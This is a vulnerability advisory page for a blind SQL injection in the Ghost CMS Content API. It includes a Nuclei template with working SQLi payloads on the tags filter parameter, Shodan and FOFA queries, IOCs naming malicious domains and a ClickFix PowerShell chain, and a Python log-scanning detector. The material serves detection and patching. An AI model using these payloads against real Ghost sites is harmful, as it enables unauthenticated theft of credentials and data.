cbcvebase.
CVE-2026-26980
published 2026-02-20


Priority: P1 87 · high · 7.5 (CVSS 3.1)
Vector: AV:N AC:L PR:N UI:N S:U C:H I:N A:N
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 70.00% (99.3rd percentile)
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.

Affected

3 ranges

Vendor      Product   Version range          Fixed in
ghost       ghost     >= 3.24.0 < 6.19.1     6.19.1
ghost       ghost     >= 3.24.0 < 6.19.1     6.19.1
tryghost    ghost

Detection & IOCs (extracted from sources)

path: /ghost/api/content/tags/
url: {{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]
Nuclei template:
id: CVE-2026-26980
info:
  name: Ghost CMS Content API - SQL Injection
  author: domwhewell-sage
  severity: critical
  description: |
    Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
  impact: |
    An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
  remediation: |
    Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
  reference:
    - https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
    - https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-26980
    epss-score: 0.32738
    epss-percentile: 0.96881
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query: http.component:"Ghost"
    fofa-query: app="Ghost"
  tags: cve,cve2026,ghost,ghostcms,sqli,vuln

flow: |
  http(1) && http(2) && http(3)

http:
  - id: extract-api-key
    method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    max-redirects: 2
    extractors:
      - type: regex
        name: api_key
        part: body
        group: 1
        regex:
          - 'data-key="([a-f0-9]{20,})"'
        internal: true

  - id: extract-first-slug
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"
    extractors:
      - type: json
        part: body
        name: first_slug
        json:
          - '.tags[0].slug'
        internal: true

  - id: check-sqli
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
    matchers:
      - type: dsl
        dsl:
          - "len(body_1) != len(body_2)"
• Detect exploitation attempts by monitoring GET requests to /ghost/api/content/tags/ where the 'filter' parameter contains SQL injection patterns such as CASE WHEN, EXP(710), or abs(-9223372036854775808) — the boolean-based blind SQLi oracle payloads used by the public PoC and Nuclei template.
• Hunt for injected JavaScript loaders at the bottom of Ghost CMS article pages that fetch second-stage code from external domains, particularly referencing clo4shara[.]xyz/11z77u3.php.
• Alert on Ghost Admin API calls (POST/PATCH to /ghost/api/admin/posts/ or /ghost/api/admin/themes/) that originate from unexpected IPs or occur outside normal publishing windows — these may indicate stolen Admin API key abuse.
• Detect ClickFix payload delivery: monitor for PowerShell processes spawned from the Windows Run dialog (explorer.exe → cmd.exe/powershell.exe) downloading DLL files and executing them via rundll32.exe.
• Hunt for the Grape/UtilifySetup Electron malware persistence path C:\Users\<user>\AppData\Local\SuperMaxionQuickMaxlite and the mutex electron.app.Grape on Windows endpoints.
• Detect C2 beaconing: look for periodic (every 30 seconds) outbound HTTP/HTTPS connections to web-telegram[.]ug from Electron-based processes (Grape.exe).
• Use the Shodan query http.component:"Ghost" or the FOFA query app="Ghost" to identify internet-exposed Ghost CMS instances for proactive patching and attack surface reduction.
• Maintain a 30-day record of Ghost Admin API call logs to enable retrospective investigation of unauthorized API key usage.
• The vulnerability only affects Ghost CMS versions 3.24.0 through 6.19.0; version 6.19.1 and later are patched. Rotating all previously used Admin API keys is required even after patching, as keys may have been exfiltrated.
• The cloaking script actively fingerprints visitors and serves benign content to security scanners and crawlers, meaning automated scanning of compromised pages may not reveal the injected malicious JavaScript.
• At least two distinct threat clusters are operating this campaign; some sites have been re-infected with different scripts after cleanup, or one cluster has replaced the other's injected script. A single cleanup pass may be insufficient.
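As an added example of the first detection point (not code from the source page or the Ghost project), the Python below scans access log lines for GET requests to /ghost/api/content/tags/ whose decoded filter parameter carries one of the oracle fragments listed above, peeling extra URL-encoding layers so a double-encoded payload is still caught; the log format, client addresses and Content API key are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

TARGET_PATH = "/ghost/api/content/tags/"
# Oracle fragments named in the detection guidance (matched case-insensitively).
SQLI_PATTERNS = [
    ("CASE WHEN", re.compile(r"\bCASE\s+WHEN\b", re.I)),
    ("EXP(710)", re.compile(r"\bEXP\s*\(\s*710\s*\)", re.I)),
    ("abs(-9223372036854775808)", re.compile(r"\babs\s*\(\s*-9223372036854775808\s*\)", re.I)),
]
# Combined-format access log: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Constructed sample log (hypothetical hosts/key): one benign call, one single-encoded
# oracle payload, and the same payload double-encoded.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Feb/2026:09:58:01 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef0123&filter=slug:news HTTP/1.1" 200 812',
    '203.0.113.9 - - [20/Feb/2026:09:58:02 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef0123&filter=slug:%5B%27%7C%7CCASE%20WHEN%201%3D1%20THEN%200%20ELSE%20EXP(710)%20END%7C%7C%27,news%5D HTTP/1.1" 200 812',
    '203.0.113.9 - - [20/Feb/2026:09:58:03 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef0123&filter=slug:%255B%2527%257C%257CCASE%2520WHEN%25201%253D0%2520THEN%25200%2520ELSE%2520EXP(710)%2520END%257C%257C%2527,news%255D HTTP/1.1" 500 101',
]


def inspect_request(method, target):
    """Return the names of oracle patterns found in the request's filter parameter."""
    parts = urlsplit(target)
    if method.upper() != "GET" or parts.path != TARGET_PATH:
        return []
    # parse_qs decodes one layer; peel a few more so double-encoding cannot hide the payload.
    candidates = []
    for value in parse_qs(parts.query).get("filter", []):
        for _ in range(3):
            candidates.append(value)
            decoded = unquote_plus(value)
            if decoded == value:
                break
            value = decoded
    return [name for name, rx in SQLI_PATTERNS if any(rx.search(v) for v in candidates)]


def scan_log(lines):
    """Return (ip, timestamp, status, hits) for every line carrying an oracle payload."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = inspect_request(m["method"], m["target"])
            if hits:
                alerts.append((m["ip"], m["ts"], m["status"], hits))
    return alerts
```

Running scan_log over the sample flags only the two requests from 203.0.113.9; the 500 on the second one is the kind of error-based signal the EXP(710) oracle produces when its branch is taken.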

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      7.5     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck             7.5     HIGH